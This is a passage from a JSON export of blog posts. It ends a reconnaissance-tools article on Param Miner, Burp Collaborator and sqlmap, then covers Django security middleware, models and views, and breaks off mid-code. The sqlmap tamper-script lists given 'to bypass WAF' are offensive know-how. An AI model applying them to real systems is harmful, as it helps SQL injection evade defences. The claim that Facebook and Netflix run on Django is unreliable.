26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div style=\"\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div style=\"font-size: large; color: rgb(14, 16, 26);\">It is one more burp extension coded by&nbsp;<a href=\"https://twitter.com/albinowax\"><font color=\"#dd4124\">James Kettle - @albinowax</font></a>. And the purpose of this tool is to identify hidden, unlinked parameters.&nbsp; This tool is helpful to exploit the \"Web Cache Positioning\" vulnerability.</div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><br></div><div style=\"font-size: large;\"><font color=\"#0e101a\"><b>GitHub Project</b>&nbsp;-&nbsp;</font><a href=\"https://github.com/portswigger/param-miner\"><font color=\"#dd4124\"><b>param-miner</b></font></a></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Burp Collaborator</font></strong><br></div><div style=\"font-size: large;\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div style=\"\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div style=\"font-size: large; color: rgb(14, 16, 26);\">I use collaborator to exploit the Blind SSRF vulnerability. And I'll also recommend using this tool to exploit SQLi and Command Execution vulnerability.</div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><ul><li><a href=\"https://portswigger.net/burp/documentation/collaborator\"><font color=\"#dd4124\"><b>Collaborator</b></font></a></li></ul></div><div style=\"\"><b style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><br></font></b></div><div style=\"\"><b style=\"color: rgb(14, 16, 26);\"><font size=\"5\">SQLMap</font></b><br></div><div style=\"\"><b style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><br></font></b></div><div style=\"\"><div style=\"\"><font color=\"#0e101a\" style=\"\" size=\"4\">I use sqlmap to exploit SQL injection vulnerability. And tamper scripts to bypass WAF.</font></div><div style=\"\"><font color=\"#0e101a\" size=\"4\"><br></font></div><div style=\"\"><font style=\"\" size=\"4\"><font color=\"#0e101a\"><b>GitHub Project -&nbsp;</b></font></font><a href=\"https://github.com/sqlmapproject/sqlmap\" style=\"font-size: large;\"><font color=\"#dd4124\"><b>sqlmap</b></font></a></div><div style=\"\"><br></div><div style=\"\"><b>General Tamper Scripts</b></div></div></span></div></span></div></span></div><p></p></div></div></span></span></div></span></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">tamper<span class=\"token operator\">=</span>apostrophemask<span class=\"token punctuation\">,</span>apostrophenullencode<span class=\"token punctuation\">,</span>base64encode<span class=\"token punctuation\">,</span>between<span class=\"token punctuation\">,</span>chardoubleencode<span class=\"token punctuation\">,</span>charencode<span class=\"token punctuation\">,</span>charunicodeencode<span class=\"token punctuation\">,</span>equaltolike<span class=\"token punctuation\">,</span>greatest<span class=\"token punctuation\">,</span>ifnull2ifisnull<span class=\"token punctuation\">,</span>multiplespaces<span class=\"token punctuation\">,</span>\nnonrecursivereplacement<span class=\"token punctuation\">,</span>percentage<span class=\"token punctuation\">,</span>randomcase<span class=\"token punctuation\">,</span>securesphere<span class=\"token punctuation\">,</span>space2comment<span class=\"token punctuation\">,</span>space2plus<span class=\"token punctuation\">,</span>space2randomblank<span class=\"token punctuation\">,</span>unionalltounion<span class=\"token punctuation\">,</span>unmagicquotes</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b>MSSQL Tamper Scripts</b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">tamper<span class=\"token operator\">=</span>between<span class=\"token punctuation\">,</span>charencode<span class=\"token punctuation\">,</span>charunicodeencode<span class=\"token punctuation\">,</span>equaltolike<span class=\"token punctuation\">,</span>greatest<span class=\"token punctuation\">,</span>multiplespaces<span class=\"token punctuation\">,</span>nonrecursivereplacement<span class=\"token punctuation\">,</span>percentage<span class=\"token punctuation\">,</span>randomcase<span class=\"token punctuation\">,</span>securesphere<span class=\"token punctuation\">,</span>sp_password<span class=\"token punctuation\">,</span>space2comment<span class=\"token punctuation\">,</span>\nspace2dash<span class=\"token punctuation\">,</span>space2mssqlblank<span class=\"token punctuation\">,</span>space2mysqldash<span class=\"token punctuation\">,</span>space2plus<span class=\"token punctuation\">,</span>space2randomblank<span class=\"token punctuation\">,</span>unionalltounion<span class=\"token punctuation\">,</span>unmagicquotes</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b>MySQL Tamper Scripts</b></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,\nmodsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,\nspace2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor<br></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">The above tools have always been my favourite tools which I use during my RECON phase. There are also many other tools, which I often use for information gathering, but the mentioned tools are also enough to gather as much information.</font><br></div><div><font size=\"4\"><br></font></div><div><div style=\"\"><font size=\"4\">I hope the article gave you an insight into RECON tools. And I'll talk about some more different tools and techniques soon.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Please share this article on your social media, so others can also be aware of RECON by reading this post.</font></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Why I switched to Django over any other framework?",
            "blog_id": "why-i-switched-to-django-over-any-other-framework",
            "author": "Anshuman Pattnaik",
            "published_date": "2021-06-08T18:18:10.389373Z",
            "last_updated_date": "2021-06-08T22:20:59.009767Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/why-i-switched-to-django-over-any-other-framework/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/why-i-switched-to-django-over-any-other-framework/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/why-i-switched-to-django-over-any-other-framework/large_thumbnail.png",
            "keywords": [
                "django",
                "python3",
                "fullstack"
            ],
            "highlights": "In this article, I'll discuss my recent web development using Django, that how Django can be helpful, developing web application projects in terms of (raid development, clean design & high security).",
            "description": "<div><font style=\"\"><font size=\"4\">In this article, I'll discuss my recent web development using Django and if you're new to this website, let me give you a short brief.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\" color=\"#023e7d\"><b>HackbotOne platform is a blogging website. The idea behind this platform is to publish contents from Application Security &amp; Software Development like (Application Development, Security Tools, Bug Bounty write-ups, Open-Source projects and many more) which can be helpful for those who have an interest and passion in these areas.</b></font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><div class=\"video-responsive\">  \n<iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/TRaejKHVhj8\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\">For the past couple of months, I did few reviews of <a href=\"https://github.com/anshumanpattnaik/hackbotone-mern-website\"><font color=\"#dd4124\">HackbotOne</font></a> old website, which I built using MERN stack a few years ago. And found out many missing parts in terms of design, technology stack &amp; security protection of the website and many more. So I have to rebuild the site from scratch with new architecture, and this time, I have chosen <a href=\"https://www.djangoproject.com/\"><font color=\"#dd4124\">Django</font></a> as the technology stack.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\">Now the question is why I have switched to Django over the <a href=\"https://www.mongodb.com/mern-stack\"><font color=\"#dd4124\">MERN</font></a> stack?</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\">Let me explain to you in brief.<br></font></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><b style=\"\"><font size=\"5\">Why Django?</font></b><br></font></div><div><font style=\"\"><b style=\"\"><font size=\"5\"><br></font></b></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\">In terms of full-stack web development, Django gained so much popularity in the industry. And due to its architecture (raid development, clean design &amp; high security), many technologist giant companies like (<font color=\"#dd4124\"><b>YouTube, Netflix, Facebook, Instagram, UBER &amp; many more</b></font>) are running on the Django web framework. The framework comes with a toolkit that saves lots of time for the developers and allows them to reuse the same components every time. Developers spent only time building new modules that will be unique throughout the development. Django is free and <a href=\"https://github.com/django/django\"><font color=\"#dd4124\">open-source</font></a> with vast community support that helps developers to build web application faster &amp; secure also contribute to the open-source community.</font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\">Now, I'll explain the architecture of Django that I found important in this framework that helps to build a full-stack based web application efficiently.</font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><b style=\"\"><font size=\"4\">Contents</font></b><br></font></font></div><div><ul><li><font style=\"\"><font style=\"\"><font size=\"4\">Django Security Protection<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\">How Django provides security protection?<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\">What is Django MVT (Models Views Templates) design pattern?</font></font></font></li></ul><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><b style=\"\"><font size=\"5\">Django Security Protection</font></b><br></div><div><font size=\"4\"><br></font></div></div><div><font size=\"4\">Web application security is always essential in every web development project to overcome the security risk to the application. So before starting on rebuilding this website, I have more concern on the security aspect that can maintain the website more efficiently and securely. So in today's modern web application development, there are many web frameworks available to develop a full-stack based web application but not every framework provides security by default to protect the application. And as per my research, I found Django has an excellent reputation for protecting web application from security vulnerabilities as it provides security protection by default.</font><br></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\">Django has built-in security middlewares that cover <a href=\"https://owasp.org/www-project-top-ten/\"><font color=\"#dd4124\">OWASP Top 10</font></a> security guidelines to protect the web application.</font><br></font></font></div><div><font style=\"\"><font style=\"\"><font size=\"4\"><br></font></font></font></div><div><font style=\"\"><font style=\"\"><b style=\"\"><font size=\"4\">Security in Django</font></b></font></font></div><div><ol><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Cross-site scripting (XSS)<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Cross-site request forgery (CSRF)<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">SQL injection<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Clickjacking<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">SSL/HTTPS<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Host header validation<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Referrer policy<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">Session security<br></font></font></font></li><li><font style=\"\"><font style=\"\"><font size=\"4\" style=\"\">User-uploaded content<br></font></font></font></li></ol><div><font size=\"4\"><br></font></div><div><font size=\"4\">Django security guideline says although it provides good security protection still it's the developer responsibility to follow some of the basic guidelines while deploying the application into production.</font><br></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please refer to Django security documentation for more information.</font></div><div><ul><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://docs.djangoproject.com/en/3.2/topics/security/\"><font color=\"#dd4124\">Django Security</font></a></font></li></ul><div><b><font size=\"5\"><br></font></b></div><div><b><font size=\"4\">How Django protect security within the framework?</font></b><br></div></div><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">To handle security vulnerabilities, Django provides built-in security middlewares to protect the application. And under the <a href=\"https://github.com/anshumanpattnaik/hackbotone-website/blob/main/hackbotone/settings.py\"><font color=\"#dd4124\">settings.py</font></a> file of every Django project, these middlewares can be found.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">MIDDLEWARE</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n    <span class=\"token string\">'django.middleware.security.SecurityMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.contrib.sessions.middleware.SessionMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.middleware.common.CommonMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.middleware.csrf.CsrfViewMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.contrib.auth.middleware.AuthenticationMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.contrib.messages.middleware.MessageMiddleware'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">'django.middleware.clickjacking.XFrameOptionsMiddleware'</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">These middlewares work like a plugin to handle various security vulnerabilities to protect the web application. And Django also allows us to create custom middleware which is also a great feature to write security plugin.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please refer to Django official security middleware documentation for more information.</font></div><div><ol><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/3.2/ref/middleware/\"><font color=\"#dd4124\">Django Middleware</font></a><br></font></li><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/2.2/_modules/django/middleware/security/\"><font color=\"#dd4124\">Security Middleware</font></a><br></font></li><li><a href=\"https://docs.djangoproject.com/en/3.2/topics/http/middleware/\"><font size=\"4\" color=\"#dd4124\">HTTP Middleware</font></a><br></li></ol><div><b><font size=\"5\"><br></font></b></div><div><b><font size=\"5\">What is Django MVT (Models Views Templates) design pattern?</font></b><br></div></div><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">The software design pattern is always quite important in every software development project, and Django follows MVT (Model View Template) design pattern in every web application project.</font><br></div><div><b><font size=\"5\"><br></font></b></div><div><b style=\"\"><font size=\"4\">Models</font></b><br></div><div><br></div><div><font size=\"4\">The model is a class that subclasses <a href=\"https://docs.djangoproject.com/en/3.2/ref/models/instances/#django.db.models.Model\"><font color=\"#dd4124\">django.db.models.Model</font></a> and Django use these models to create tables in the database. And the model act as an interface to simplify the complex database query and maps to one single table in the database, an attribute of the model represent as database fields.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Quick example</b><br></font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">In this example below, <a href=\"https://github.com/anshumanpattnaik/hackbotone-api/blob/main/blogs/models.py#L5\" style=\"\"><font color=\"#dd4124\">Blog</font></a> is a model class with 15 fields defined as class attributes and maps to the database column.&nbsp;</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token keyword\">class</span> <span class=\"token class-name\">Blog</span><span class=\"token punctuation\">(</span>models<span class=\"token punctuation\">.</span><span class=\"token property-access\"><span class=\"token maybe-class-name\">Model</span></span><span class=\"token punctuation\">)</span><span class=\"token operator\">:</span>\n   title <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   blog_id <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   author <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   published_date <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">DateTimeField</span></span><span class=\"token punctuation\">(</span>auto_now_add<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   last_updated_date <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">DateTimeField</span></span><span class=\"token punctuation\">(</span>auto_now<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   seo_thumbnail <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   small_thumbnail <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   thumbnail <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   keywords <span class=\"token operator\">=</span> <span class=\"token function\"><span class=\"token maybe-class-name\">ArrayField</span></span><span class=\"token punctuation\">(</span>models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">CharField</span></span><span class=\"token punctuation\">(</span>max_length<span class=\"token operator\">=</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   highlights <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">TextField</span></span><span class=\"token punctuation\">(</span>blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   description <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">TextField</span></span><span class=\"token punctuation\">(</span>blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span>\n   visibility <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">BooleanField</span></span><span class=\"token punctuation\">(</span><span class=\"token keyword module\">default</span><span class=\"token operator\">=</span><span class=\"token maybe-class-name\">False</span><span class=\"token punctuation\">)</span>\n   is_featured <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">BooleanField</span></span><span class=\"token punctuation\">(</span><span class=\"token keyword module\">default</span><span class=\"token operator\">=</span><span class=\"token maybe-class-name\">False</span><span class=\"token punctuation\">)</span>\n   featured_board <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">BooleanField</span></span><span class=\"token punctuation\">(</span><span class=\"token keyword module\">default</span><span class=\"token operator\">=</span><span class=\"token maybe-class-name\">False</span><span class=\"token punctuation\">)</span>\n   featured <span class=\"token operator\">=</span> models<span class=\"token punctuation\">.</span><span class=\"token method function property-access\"><span class=\"token maybe-class-name\">TextField</span></span><span class=\"token punctuation\">(</span>blank<span class=\"token operator\">=</span><span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">)</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Django's Database engine will map to the above model and create a table like below.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">CREATE</span> <span class=\"token constant\">TABLE</span> <span class=\"token keyword\">public</span><span class=\"token punctuation\">.</span><span class=\"token method function property-access\">blogs_blog</span> <span class=\"token punctuation\">(</span>\n\tid serial <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span> <span class=\"token constant\">PRIMARY</span> <span class=\"token constant\">KEY</span><span class=\"token punctuation\">,</span>\n\ttitle character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tblog_id character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tauthor character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tpublished_date timestamp <span class=\"token keyword\">with</span> time zone <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tlast_updated_date timestamp <span class=\"token keyword\">with</span> time zone <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tseo_thumbnail character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tsmall_thumbnail character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tthumbnail character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">500</span><span class=\"token punctuation\">)</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tkeywords character <span class=\"token function\">varying</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\thighlights text <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tdescription text <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tvisibility boolean <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tis_featured boolean <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tfeatured text <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span>\n\tfeatured_board boolean <span class=\"token constant\">NOT</span> <span class=\"token constant\">NULL</span>\n<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Please refer to Django official documentation of Models for further understanding.</font><br></div><div><ul><li><a href=\"https://docs.djangoproject.com/en/3.2/topics/db/models/\"><font color=\"#dd4124\" size=\"4\">DB Models</font></a><br></li></ul><div><b><font size=\"5\"><br></font></b></div><div><b><font size=\"4\">Views</font></b><br></div></div><div><b><font size=\"5\"><br></font></b></div><div><font style=\"\"><font size=\"4\">The Django views are essential components of every web application that takes a web request and returns a web response. And the acknowledgement can be an anything HTML page or redirect to another page.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><b style=\"\"><font size=\"4\">Django Official documentation says&nbsp;</font></b></font></div><div><font style=\"\"><b style=\"\"><font size=\"4\"><br></font></b></font></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\" style=\"\" color=\"#023e7d\"><b style=\"\">When a page is requested, Django creates an HttpRequest object that contains metadata about the request. Then Django loads the appropriate view, passing the HttpRequest as the first argument to the view function. Each way view is responsible for returning an HttpResponse object.</b></font></span></span><font size=\"4\" style=\"color: rgb(107, 91, 149);\"><b><br></b></font></div><div><font style=\"\"><em style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\"><br></font></span></em></font></div><div><font color=\"#0e101a\" size=\"4\"><b>Quick example</b></font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token keyword module\">from</span> django<span class=\"token punctuation\">.</span><span class=\"token property-access\">shortcuts</span> <span class=\"token keyword module\">import</span> render\n\ndef <span class=\"token function\">index</span><span class=\"token punctuation\">(</span>request<span class=\"token punctuation\">)</span><span class=\"token operator\">:</span>\n   <span class=\"token keyword control-flow\">return</span> <span class=\"token function\">render</span><span class=\"token punctuation\">(</span>request<span class=\"token punctuation\">,</span> <span class=\"token string\">'index.html'</span><span class=\"token punctuation\">)</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Let's understand the above example code line by line.</font><br></div><div><ol><li><font size=\"4\">First, we imported the render method that returns the HTTPResponse object.<br></font></li><li><font size=\"4\">Second, we defined an index function that takes the request object as an argument which is nothing but an HTTPRequest object.<br></font></li><li><font size=\"4\">Third, the index function is a view function that returns the HTTPResponse object.</font></li></ol></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please refer to Django official documentation of the view function for further understanding.</font><br></div><div><ul><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/3.2/topics/http/views/\"><font color=\"#dd4124\">Django Views</font></a><br></font></li></ul><div><b><br></b></div><div><b><font size=\"4\">Templates</font></b><br></div></div><div><b><font size=\"4\"><br></font></b></div><div><font size=\"4\">The Django templates are the third most essential components of the web application. Templates provide a layout to the web pages so that the user can view the final website, in Django templates are build using HTML, CSS &amp; JavaScript, which are the core components of a webpage.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Django template system configured in <a href=\"https://github.com/anshumanpattnaik/hackbotone-api/blob/main/api/settings.py\"><font color=\"#dd4124\">settings.py</font></a> that contains configuration like to update the DIRS path and so on.</font><br></div><div><font size=\"4\"><br></font></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">TEMPLATES</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token string\">'BACKEND'</span><span class=\"token operator\">:</span> <span class=\"token string\">'django.template.backends.django.DjangoTemplates'</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'DIRS'</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'APP_DIRS'</span><span class=\"token operator\">:</span> <span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'OPTIONS'</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token string\">'context_processors'</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">[</span>\n                <span class=\"token 